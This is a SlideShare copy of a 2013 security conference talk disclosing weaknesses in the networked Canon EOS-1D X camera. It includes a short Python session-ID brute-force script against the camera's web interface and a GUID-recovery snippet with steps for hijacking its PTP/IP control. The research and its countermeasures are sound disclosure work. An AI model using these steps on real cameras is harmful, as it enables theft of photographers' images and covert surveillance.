SlideShare a Scribd company logo

[HES2013] Paparazzi over ip by Daniel Mende

Hackito Ergo Sum
Hackito Ergo Sum

Almost every recent higher class DSLR camera features multiple and complex access technologies. For example, CANON’s new flagship features IP connectivity both wired via 802.3 and wireless via 802.11. All big vendors are pushing these features to the market and advertise them as realtime image transfer to the cloud. We have taken a look at the layer 2 and 3 implementations in the CamOS and the services running upon those. Not only did we discover weak plaintext protocols used in the communication, we’ve also been able to gain complete control of the camera, including modification of camera settings, file transfer and image live stream. So in the end the “upload to the clouds” feature resulted in an image stealing Man-in-the-Imageflow. We will present the results of our research on cutting edge cameras, exploit the weaknesses in a live demo and release a tool after the presentation. https://www.hackitoergosum.org

SoftwareArt & PhotosTechnology
1 of 66
Download to read offline
www.ernw.de Paparazzi over IP Daniel Mende dmende@ernw.de
www.ernw.de Who we are ¬ Old-school network geeks, working as security researchers for Germany based ERNW GmbH  Independent  Deep technical knowledge  Structured (assessment) approach  Business reasonable recommendations  We understand corporate ¬ Blog: www.insinuator.net ¬ Conference: www.troopers.de 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #2
www.ernw.de Agenda ¬ Intro ¬ Transport Protocols ¬ Communication Modes & Attacks ¬ Conclusions 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #3
www.ernw.de Intro ¬ A number of current high-end cameras have network interfaces. ¬ We did some research as for their security and potential attack paths. ¬ In the following we focus on Canons new flagship EOS 1D X, but similar problems might be found in other models, of other vendors, too. 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #4
www.ernw.de The Camera Canon EOS-1D X 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #5
www.ernw.de The Camera ¬ From Canon USA:  A built in Ethernet port allows for fast, easy transfer of images directly to a PC or via a network to clients from live events.  The EOS-1D X is compatible with the new WFT-E6A Wireless File Transmitter for wireless LAN transfer with the IEEE 802.11 a/b/g/n standards. A Bit of Marketing 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #6
www.ernw.de The Camera The Ethernet Port 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #7
www.ernw.de The Camera WLAN Adapter 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #8
www.ernw.de The Target aka. Mr. Reuters 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #9
www.ernw.de The Target ¬ One could get the real, unedited images first. ¬ One could upload (bad) images. ¬ One could turn the camera into a surveillance device. What if 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #10
www.ernw.de Transport The underlying Protocols
www.ernw.de Transport ¬ Wired LAN via built-in Ethernet port or Wireless LAN via WFT-E6A. ¬ Standard TCP/IP (no IPv6, yet). 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #12
www.ernw.de Traditional Attacks ¬ ARP-spoofing possible.  No “sticky” ARP entries ¬ ARP-flooding with ~100 packets per second DoS the network stack. ¬ Btw. stack also dies if IPv6 (multicast) is present. Layer 2 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #13
www.ernw.de Traditional Attacks ¬ TCP/IP is used for all network communication. ¬ Established connections can be killed via TCP-RST. Layer 3/4 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #14
www.ernw.de Communication Modes
www.ernw.de Communication Modes ¬ FTP Upload Mode ¬ DLNA ¬ Built-in webserver ¬ EOS Utility Overview 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #16
www.ernw.de FTP Upload Mode
www.ernw.de FTP Upload Mode ¬ Target server and credentials configured on camera. ¬ Photos taken are uploaded to the server immediately. Mode of operation 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #18
www.ernw.de FTP Upload Mode ¬ As FTP is clear text, credentials can be sniffed. ¬ As well as the complete data transmission ¬ Uploaded pictures can be extracted from network traffic. Downside 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #19
www.ernw.de FTP Upload Mode 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #20
www.ernw.de FTP Upload Mode 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #21
www.ernw.de DLNA mode
www.ernw.de DLNA mode ¬ Digital Living Network Alliance® ¬ UPnP used for discovery. ¬ DLNA guidelines for file formats, encodings, resolutions. ¬ HTTP and XML used to access media. Overview 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #23
www.ernw.de DLNA mode ¬ No authentication. ¬ No restrictions. ¬ Every DLNA client can download _all_ images. ¬ Your Browser could be a DLNA client. Or somebody else's browser. For your camera. Cons 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #24
www.ernw.de Built-in webserver Always a good idea…
www.ernw.de Built-in webserver ¬ Wireless File Transmitter Server Mode. ¬ Canon USA: “Use a web browser to capture, view and download images remotely” Canon WFT Server 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #26
www.ernw.de Built-in webserver ¬ Browser interface uses AJAX. ¬ Embedded webserver only capable of HTTP GET method.  Every other request method is answered with a 404. Canon WFT Server 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #27
www.ernw.de Built-in webserver ¬ Authentication via HTTP Basic (RFC 2617) on login page. ¬ Session cookie is used afterwards. ¬ Cookie looks like sessionID=40b1  4 (!!!) byte Session ID  65535 possible IDs Authentication 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #28
www.ernw.de Built-in webserver ¬ Session ID Brute force implemented in 6 lines of python. ¬ To check for all possible IDs takes about 20 minutes.  Embedded Webserver is not that responsive. 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #29
www.ernw.de import requests target_uri = 'http://192.168.1.103/api/cam/lvoutput' target_string = 'SESSION_ERR' for i in xrange(0xffff): if (i != 0 and i%1000 == 0): print str(i) + 'IDs checked' r = requests.get(target_uri, cookies={'sessionID': '%x' %i}) if r.text.find(target_string) == -1: print 'SessionID is : sessionID=%x' %i break 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #30
www.ernw.de5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #31
www.ernw.de Built-in webserver ¬ Full access to Live View, stored photos and camera settings. ¬ You surf – We brute. recap 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #32
www.ernw.de Built-in webserver ¬ Camera in WFT Server mode. ¬ Valid session opened by user. ¬ Some minutes of time. Requirements 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #33
www.ernw.de EOS Utility mode aka. I wanna be root
www.ernw.de EOS Utility mode The Utility 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #35
www.ernw.de EOS Utility mode The Utility 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #36
www.ernw.de EOS Utility mode ¬ Allows remote control of all non- manual camera functions. ¬ Pictures can be up- and downloaded. ¬ Possibly even more (sound recording anyone?) Overview 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #37
www.ernw.de EOS Utility mode ¬ SSDP and MDNS used for discovery. ¬ PTP/IP used for communication. ¬ Needs initial camera <-> software pairing. Technical 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #38
www.ernw.de EOS Utility mode ¬ At first use, credentials needs to be exchanged between the camera and the client software. ¬ Camera must be put into pairing mode via camera menu. ¬ Camera signals the need for pairing via MDNS. Pairing 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #39
www.ernw.de5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #40
www.ernw.de EOS Utility mode Pairing 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #41
www.ernw.de EOS Utility mode ¬ Client software connects to camera via PTP/IP. ¬ PTP/IP Authentication is successful regardless of the credentials. ¬ Credentials (hostname, GUID) are stored on the camera. Pairing 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #42
www.ernw.de PTP/IP Feels like USBoIP )-:
www.ernw.de PTP/IP ¬ Picture Transfer Protocol over Internet Protocol. ¬ ISO 15740. ¬ Standardized by International Imaging Industry Association 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #44
www.ernw.de PTP/IP ¬ Wrapper for PTP with header: 4 byte length (little endian) 4 byte type (little endian) data Packet format 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #45
www.ernw.de PTP/IP Layering 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #46
www.ernw.de PTP/IP ¬ PTPIP_INIT_COMMAND_REQUEST  Includes authentication data: 16 byte GUID hostname string Authentication 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #47
www.ernw.de PTPIP_INIT_COMMAND_REQUEST 2a 00 00 00 01 00 00 00 eb 7a 78 9d 69 cb 64 4e a3 e0 fc 96 ef 59 79 42 73 00 65 00 72 00 76 00 65 00 72 00 00 00 00 00 01 00 Paket length = 42 byte Paket type = 0x01 = PTPIP_INIT_COMMAND_REQUEST GUID Hostname = “server” @ utf16 Trailer 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #48
www.ernw.de PTP
www.ernw.de PTP ¬ Picture Transfer Protocol ¬ Standardized by International Imaging Industry Association ¬ ISO 15740 ¬ Lots of proprietary vendor extensions. Explained 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #50
www.ernw.de PTP ¬ Designed for use over USB ¬ Fixed length ¬ 2 byte Msg Code ¬ 4 byte Session ID ¬ 4 byte Transaction ID ¬ 5 times 4 byte Parameter or Data Packet format 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #51
www.ernw.de PTP ¬ Lot of standardized codes like:  PTP_GetDeviceInfo  PTP_OpenSession  PTP_CloseSession  PTP_GetStorageIDs ¬ Also Vendor specific codes like:  PTP_CANON_GetCustomizeSpec  PTP_CANON_GetCustomizeItemInfo Message Codes 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #52
www.ernw.de PTP ¬ Thankfully there are some implementations around. ¬ We decided to go with libgphoto2. ¬ Basic PTP/IP support is included as well. Use of 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #53
www.ernw.de The Attack aka. gottcha
www.ernw.de Attack ¬ Client Hostname easy discoverable, but not needed.  Camera also excepts connections with a different hostname. ¬ GUID unknown to client software. ¬ Obfuscated GUID is broadcasted by the cam via UPNP. Getting the Credentials 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #55
www.ernw.de5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #56
www.ernw.de tmp = mdns_info.getProperties()['tid.canon.com'].split('-') guid = [] l = lambda s: [ s[i:i+2:] for i in xrange(0,len(s),2) ][::-1] for i in xrange(0,3): guid += l(tmp[i]) guid += tmp[3] guid += tmp[4] guid = "".join(guid) guid = eb7a789d69cb644ea3e0fc96ef597942 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #57
www.ernw.de The Attack ¬ Camera only allows one connection. ¬ Already connected client needs to be disconnected. ¬ TCP-RST the established PTP/IP connection. Connecting to the Camera 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #58
www.ernw.de Attack ¬ Listen for the Cam on MDNS. ¬ De-obfuscate Authentication data. ¬ Disconnect connected Client Software. ¬ Connect via PTP/IP. ¬ Have Phun (-; Process 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #59
www.ernw.de5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #60
www.ernw.de Attack outlined ¬ Photograph uses hotel / Starbucks WLAN, which isn’t unlikely during events (think of Grammy Awards few days ago). ¬ Almost anybody in the same LAN can download the images from the camera (and even more). So you can write it down 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #61
www.ernw.de Countermeasures ¬ Enable network functionality only in trusted Networks. ¬ Use WPA and a secure passphrase for (your trusted) WLAN. 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #62
www.ernw.de Conclusions ¬ High-end cameras are yet another daily life item equipped with networking capabilities incl. full-blown IP stacks. ¬ Once more, their device-specific network technologies have been designed and implemented without (too much) security in mind. ¬ Again, this leads to (classes of) attacks previously unknown to their non- networked counterparts. 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #63
www.ernw.de Next Steps New series of DSLRs (EOS 6D)  Built-in Wireless Access Point  New communication protocol for IOS/Android App New series of camcorder(XA20, XA25) 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #64
www.ernw.de There’s never enough time… 5/27/2013 © ERNW GmbH | Carl-Bosch-Str. 4 | DE-69115 Heidelberg #65 THANK YOU… ...for yours!
www.ernw.de Questions? © ERNW GmbH | Breslauer Str. 28 | D-69124 66

Recommended

C13 – Profibus and Profinet network design - Andy Verwer, VTC
C13 – Profibus and Profinet network design - Andy Verwer, VTCC13 – Profibus and Profinet network design - Andy Verwer, VTC
C13 – Profibus and Profinet network design - Andy Verwer, VTCPROFIBUS and PROFINET InternationaI - PI UK
 
C14 Profibus and Profinet – a perfect match made in Karlsruhe - James Powel...
C14 Profibus and Profinet – a perfect match made in Karlsruhe - James Powel...C14 Profibus and Profinet – a perfect match made in Karlsruhe - James Powel...
C14 Profibus and Profinet – a perfect match made in Karlsruhe - James Powel...PROFIBUS and PROFINET InternationaI - PI UK
 
3. The basics of PROFIBUS and PROFINET - Mark Freeman
3. The basics of PROFIBUS and PROFINET - Mark Freeman3. The basics of PROFIBUS and PROFINET - Mark Freeman
3. The basics of PROFIBUS and PROFINET - Mark FreemanPROFIBUS and PROFINET InternationaI - PI UK
 
Practical steps to a successful PROFIBUS project - Richard Needham and Xiu Ji
Practical steps to a successful PROFIBUS project - Richard Needham and Xiu JiPractical steps to a successful PROFIBUS project - Richard Needham and Xiu Ji
Practical steps to a successful PROFIBUS project - Richard Needham and Xiu JiPROFIBUS and PROFINET InternationaI - PI UK
 
PROFINET in process - Peter Brown
PROFINET in process - Peter BrownPROFINET in process - Peter Brown
PROFINET in process - Peter BrownPROFIBUS and PROFINET InternationaI - PI UK
 
beroNet 2014 VoIP Guys Roadshow Presentation
beroNet 2014 VoIP Guys Roadshow PresentationberoNet 2014 VoIP Guys Roadshow Presentation
beroNet 2014 VoIP Guys Roadshow Presentationpascom
 
PROFIBUS commissioning and maintenance - Richard Needham
PROFIBUS commissioning and maintenance - Richard NeedhamPROFIBUS commissioning and maintenance - Richard Needham
PROFIBUS commissioning and maintenance - Richard NeedhamPROFIBUS and PROFINET InternationaI - PI UK
 
Profibus PA device calibration and maintenance - Andy Verwer
Profibus PA device calibration and maintenance - Andy VerwerProfibus PA device calibration and maintenance - Andy Verwer
Profibus PA device calibration and maintenance - Andy VerwerPROFIBUS and PROFINET InternationaI - PI UK
 

Recommended

C13 – Profibus and Profinet network design - Andy Verwer, VTC
C13 – Profibus and Profinet network design - Andy Verwer, VTCC13 – Profibus and Profinet network design - Andy Verwer, VTC
C13 – Profibus and Profinet network design - Andy Verwer, VTCPROFIBUS and PROFINET InternationaI - PI UK
 
C14 Profibus and Profinet – a perfect match made in Karlsruhe - James Powel...
C14 Profibus and Profinet – a perfect match made in Karlsruhe - James Powel...C14 Profibus and Profinet – a perfect match made in Karlsruhe - James Powel...
C14 Profibus and Profinet – a perfect match made in Karlsruhe - James Powel...PROFIBUS and PROFINET InternationaI - PI UK
 
3. The basics of PROFIBUS and PROFINET - Mark Freeman
3. The basics of PROFIBUS and PROFINET - Mark Freeman3. The basics of PROFIBUS and PROFINET - Mark Freeman
3. The basics of PROFIBUS and PROFINET - Mark FreemanPROFIBUS and PROFINET InternationaI - PI UK
 
Practical steps to a successful PROFIBUS project - Richard Needham and Xiu Ji
Practical steps to a successful PROFIBUS project - Richard Needham and Xiu JiPractical steps to a successful PROFIBUS project - Richard Needham and Xiu Ji
Practical steps to a successful PROFIBUS project - Richard Needham and Xiu JiPROFIBUS and PROFINET InternationaI - PI UK
 
PROFINET in process - Peter Brown
PROFINET in process - Peter BrownPROFINET in process - Peter Brown
PROFINET in process - Peter BrownPROFIBUS and PROFINET InternationaI - PI UK
 
beroNet 2014 VoIP Guys Roadshow Presentation
beroNet 2014 VoIP Guys Roadshow PresentationberoNet 2014 VoIP Guys Roadshow Presentation
beroNet 2014 VoIP Guys Roadshow Presentationpascom
 
PROFIBUS commissioning and maintenance - Richard Needham
PROFIBUS commissioning and maintenance - Richard NeedhamPROFIBUS commissioning and maintenance - Richard Needham
PROFIBUS commissioning and maintenance - Richard NeedhamPROFIBUS and PROFINET InternationaI - PI UK
 
Profibus PA device calibration and maintenance - Andy Verwer
Profibus PA device calibration and maintenance - Andy VerwerProfibus PA device calibration and maintenance - Andy Verwer
Profibus PA device calibration and maintenance - Andy VerwerPROFIBUS and PROFINET InternationaI - PI UK
 
Annotated bibliography
Annotated bibliographyAnnotated bibliography
Annotated bibliographyaharrislibrarian
 
Authentic Assessment: building a longitudinal information literacy assessment...
Authentic Assessment: building a longitudinal information literacy assessment...Authentic Assessment: building a longitudinal information literacy assessment...
Authentic Assessment: building a longitudinal information literacy assessment...Alan Carbery
 
andrea slaven Instructional Technology Portfolio
andrea slaven Instructional Technology Portfolioandrea slaven Instructional Technology Portfolio
andrea slaven Instructional Technology PortfolioAndrea Slaven
 
ENG 101 -- Essay 3 Annotated Bibliography
ENG 101 -- Essay 3 Annotated BibliographyENG 101 -- Essay 3 Annotated Bibliography
ENG 101 -- Essay 3 Annotated Bibliographyaharrislibrarian
 
ORE Connections February 2010
ORE Connections February 2010ORE Connections February 2010
ORE Connections February 2010Office of Religious Education
 
Identifying Gifted Students
Identifying Gifted StudentsIdentifying Gifted Students
Identifying Gifted StudentsAngela Housand
 
Europaiunionjeopardy_Englishl
Europaiunionjeopardy_EnglishlEuropaiunionjeopardy_Englishl
Europaiunionjeopardy_Englishlszabjass
 
Citation Basics for Audio / Visual Material
Citation Basics for Audio / Visual MaterialCitation Basics for Audio / Visual Material
Citation Basics for Audio / Visual MaterialCollege of the Rockies
 
My project proposal
My project proposalMy project proposal
My project proposalChelc Hindsite
 
Annotated bibliographies
Annotated bibliographiesAnnotated bibliographies
Annotated bibliographieskhornberger
 
Creating an Annotated Bibliography in APA Style
Creating an Annotated Bibliography in APA StyleCreating an Annotated Bibliography in APA Style
Creating an Annotated Bibliography in APA StyleCollege of the Rockies
 
Duke's eLearning Roadmap and the Sakai Transition
Duke's eLearning Roadmap and the Sakai TransitionDuke's eLearning Roadmap and the Sakai Transition
Duke's eLearning Roadmap and the Sakai TransitionShawn Miller
 
module in english grade 8
module in english grade 8module in english grade 8
module in english grade 8Kyla Basco
 
Grade 8 English teachers guide Q1 Only
Grade 8 English teachers guide Q1 OnlyGrade 8 English teachers guide Q1 Only
Grade 8 English teachers guide Q1 OnlyMelanio Florino
 
fiware-lab-dev-4.pdf
fiware-lab-dev-4.pdffiware-lab-dev-4.pdf
fiware-lab-dev-4.pdfssuser8c74ba
 
4. PROFIBUS DP and PA network design - Andy Smith
4. PROFIBUS DP and PA network design - Andy Smith4. PROFIBUS DP and PA network design - Andy Smith
4. PROFIBUS DP and PA network design - Andy SmithPROFIBUS and PROFINET InternationaI - PI UK
 
Profibus DP/PA network design - Andy Smith
Profibus DP/PA network design - Andy SmithProfibus DP/PA network design - Andy Smith
Profibus DP/PA network design - Andy SmithPROFIBUS and PROFINET InternationaI - PI UK
 
W04 Profinet in process automation - Pete Brown, Siemens
W04 Profinet in process automation - Pete Brown, SiemensW04 Profinet in process automation - Pete Brown, Siemens
W04 Profinet in process automation - Pete Brown, SiemensPROFIBUS and PROFINET InternationaI - PI UK
 
Architecting an ibm sametime 9.0 audio visual deployment
Architecting an ibm sametime 9.0 audio visual deploymentArchitecting an ibm sametime 9.0 audio visual deployment
Architecting an ibm sametime 9.0 audio visual deploymenta8us
 
Продвигая вперед искусство безопасности. Siemens
Продвигая вперед искусство безопасности. Siemens Продвигая вперед искусство безопасности. Siemens
Продвигая вперед искусство безопасности. Siemens journalrubezh
 
Open mic mediaarchitecture_121113
Open mic mediaarchitecture_121113Open mic mediaarchitecture_121113
Open mic mediaarchitecture_121113a8us
 
fiware-lab-dev-3.pdf
fiware-lab-dev-3.pdffiware-lab-dev-3.pdf
fiware-lab-dev-3.pdfssuser8c74ba
 

More Related Content

Viewers also liked

Authentic Assessment: building a longitudinal information literacy assessment...
Authentic Assessment: building a longitudinal information literacy assessment...Authentic Assessment: building a longitudinal information literacy assessment...
Authentic Assessment: building a longitudinal information literacy assessment...Alan Carbery
 
andrea slaven Instructional Technology Portfolio
andrea slaven Instructional Technology Portfolioandrea slaven Instructional Technology Portfolio
andrea slaven Instructional Technology PortfolioAndrea Slaven
 
ENG 101 -- Essay 3 Annotated Bibliography
ENG 101 -- Essay 3 Annotated BibliographyENG 101 -- Essay 3 Annotated Bibliography
ENG 101 -- Essay 3 Annotated Bibliographyaharrislibrarian
 
Identifying Gifted Students
Identifying Gifted StudentsIdentifying Gifted Students
Identifying Gifted StudentsAngela Housand
 
Europaiunionjeopardy_Englishl
Europaiunionjeopardy_EnglishlEuropaiunionjeopardy_Englishl
Europaiunionjeopardy_Englishlszabjass
 
Citation Basics for Audio / Visual Material
Citation Basics for Audio / Visual MaterialCitation Basics for Audio / Visual Material
Citation Basics for Audio / Visual MaterialCollege of the Rockies
 
Annotated bibliographies
Annotated bibliographiesAnnotated bibliographies
Annotated bibliographieskhornberger
 
Creating an Annotated Bibliography in APA Style
Creating an Annotated Bibliography in APA StyleCreating an Annotated Bibliography in APA Style
Creating an Annotated Bibliography in APA StyleCollege of the Rockies
 
Duke's eLearning Roadmap and the Sakai Transition
Duke's eLearning Roadmap and the Sakai TransitionDuke's eLearning Roadmap and the Sakai Transition
Duke's eLearning Roadmap and the Sakai TransitionShawn Miller
 
module in english grade 8
module in english grade 8module in english grade 8
module in english grade 8Kyla Basco
 
Grade 8 English teachers guide Q1 Only
Grade 8 English teachers guide Q1 OnlyGrade 8 English teachers guide Q1 Only
Grade 8 English teachers guide Q1 OnlyMelanio Florino
 

Viewers also liked (14)

Annotated bibliography
Annotated bibliographyAnnotated bibliography
Annotated bibliography
 
Authentic Assessment: building a longitudinal information literacy assessment...
Authentic Assessment: building a longitudinal information literacy assessment...Authentic Assessment: building a longitudinal information literacy assessment...
Authentic Assessment: building a longitudinal information literacy assessment...
 
andrea slaven Instructional Technology Portfolio
andrea slaven Instructional Technology Portfolioandrea slaven Instructional Technology Portfolio
andrea slaven Instructional Technology Portfolio
 
ENG 101 -- Essay 3 Annotated Bibliography
ENG 101 -- Essay 3 Annotated BibliographyENG 101 -- Essay 3 Annotated Bibliography
ENG 101 -- Essay 3 Annotated Bibliography
 
ORE Connections February 2010
ORE Connections February 2010ORE Connections February 2010
ORE Connections February 2010
 
Identifying Gifted Students
Identifying Gifted StudentsIdentifying Gifted Students
Identifying Gifted Students
 
Europaiunionjeopardy_Englishl
Europaiunionjeopardy_EnglishlEuropaiunionjeopardy_Englishl
Europaiunionjeopardy_Englishl
 
Citation Basics for Audio / Visual Material
Citation Basics for Audio / Visual MaterialCitation Basics for Audio / Visual Material
Citation Basics for Audio / Visual Material
 
My project proposal
My project proposalMy project proposal
My project proposal
 
Annotated bibliographies
Annotated bibliographiesAnnotated bibliographies
Annotated bibliographies
 
Creating an Annotated Bibliography in APA Style
Creating an Annotated Bibliography in APA StyleCreating an Annotated Bibliography in APA Style
Creating an Annotated Bibliography in APA Style
 
Duke's eLearning Roadmap and the Sakai Transition
Duke's eLearning Roadmap and the Sakai TransitionDuke's eLearning Roadmap and the Sakai Transition
Duke's eLearning Roadmap and the Sakai Transition
 
module in english grade 8
module in english grade 8module in english grade 8
module in english grade 8
 
Grade 8 English teachers guide Q1 Only
Grade 8 English teachers guide Q1 OnlyGrade 8 English teachers guide Q1 Only
Grade 8 English teachers guide Q1 Only
 

Similar to [HES2013] Paparazzi over ip by Daniel Mende

fiware-lab-dev-4.pdf
fiware-lab-dev-4.pdffiware-lab-dev-4.pdf
fiware-lab-dev-4.pdfssuser8c74ba
 
Architecting an ibm sametime 9.0 audio visual deployment
Architecting an ibm sametime 9.0 audio visual deploymentArchitecting an ibm sametime 9.0 audio visual deployment
Architecting an ibm sametime 9.0 audio visual deploymenta8us
 
Продвигая вперед искусство безопасности. Siemens
Продвигая вперед искусство безопасности. Siemens Продвигая вперед искусство безопасности. Siemens
Продвигая вперед искусство безопасности. Siemens journalrubezh
 
Open mic mediaarchitecture_121113
Open mic mediaarchitecture_121113Open mic mediaarchitecture_121113
Open mic mediaarchitecture_121113a8us
 
fiware-lab-dev-3.pdf
fiware-lab-dev-3.pdffiware-lab-dev-3.pdf
fiware-lab-dev-3.pdfssuser8c74ba
 
The Gurubox Project: Open Source Troubleshooting Tools
The Gurubox Project: Open Source Troubleshooting ToolsThe Gurubox Project: Open Source Troubleshooting Tools
The Gurubox Project: Open Source Troubleshooting ToolsWes Morgan
 
The Gurubox Project: Open Source Troubleshooting Tools
The Gurubox Project: Open Source Troubleshooting ToolsThe Gurubox Project: Open Source Troubleshooting Tools
The Gurubox Project: Open Source Troubleshooting ToolsAll Things Open
 
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...michelemanzotti
 
IPv6 Support at NEC CEs
IPv6 Support at NEC CEsIPv6 Support at NEC CEs
IPv6 Support at NEC CEsAPNIC
 
Chris Swan's CloudExpo Europe presentation "Waves of adoption for Network Fun...
Chris Swan's CloudExpo Europe presentation "Waves of adoption for Network Fun...Chris Swan's CloudExpo Europe presentation "Waves of adoption for Network Fun...
Chris Swan's CloudExpo Europe presentation "Waves of adoption for Network Fun...Cohesive Networks
 
Decreasing Incident Response Time
Decreasing Incident Response TimeDecreasing Incident Response Time
Decreasing Incident Response TimeBoni Bruno
 

Similar to [HES2013] Paparazzi over ip by Daniel Mende (20)

fiware-lab-dev-4.pdf
fiware-lab-dev-4.pdffiware-lab-dev-4.pdf
fiware-lab-dev-4.pdf
 
4. PROFIBUS DP and PA network design - Andy Smith
4. PROFIBUS DP and PA network design - Andy Smith4. PROFIBUS DP and PA network design - Andy Smith
4. PROFIBUS DP and PA network design - Andy Smith
 
Profibus DP/PA network design - Andy Smith
Profibus DP/PA network design - Andy SmithProfibus DP/PA network design - Andy Smith
Profibus DP/PA network design - Andy Smith
 
W04 Profinet in process automation - Pete Brown, Siemens
W04 Profinet in process automation - Pete Brown, SiemensW04 Profinet in process automation - Pete Brown, Siemens
W04 Profinet in process automation - Pete Brown, Siemens
 
Architecting an ibm sametime 9.0 audio visual deployment
Architecting an ibm sametime 9.0 audio visual deploymentArchitecting an ibm sametime 9.0 audio visual deployment
Architecting an ibm sametime 9.0 audio visual deployment
 
Продвигая вперед искусство безопасности. Siemens
Продвигая вперед искусство безопасности. Siemens Продвигая вперед искусство безопасности. Siemens
Продвигая вперед искусство безопасности. Siemens
 
Open mic mediaarchitecture_121113
Open mic mediaarchitecture_121113Open mic mediaarchitecture_121113
Open mic mediaarchitecture_121113
 
fiware-lab-dev-3.pdf
fiware-lab-dev-3.pdffiware-lab-dev-3.pdf
fiware-lab-dev-3.pdf
 
The Gurubox Project: Open Source Troubleshooting Tools
The Gurubox Project: Open Source Troubleshooting ToolsThe Gurubox Project: Open Source Troubleshooting Tools
The Gurubox Project: Open Source Troubleshooting Tools
 
The Gurubox Project: Open Source Troubleshooting Tools
The Gurubox Project: Open Source Troubleshooting ToolsThe Gurubox Project: Open Source Troubleshooting Tools
The Gurubox Project: Open Source Troubleshooting Tools
 
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
All Your Calls Are Still Belong to Us: How We Compromised the Cisco VoIP Cryp...
 
4. profibus dp pa network design chris mc comb
4. profibus dp pa network design chris mc comb4. profibus dp pa network design chris mc comb
4. profibus dp pa network design chris mc comb
 
IPv6 Support at NEC CEs
IPv6 Support at NEC CEsIPv6 Support at NEC CEs
IPv6 Support at NEC CEs
 
Introduction to PROFIBUS for process automation Andy Verwer
Introduction to PROFIBUS for process automation Andy VerwerIntroduction to PROFIBUS for process automation Andy Verwer
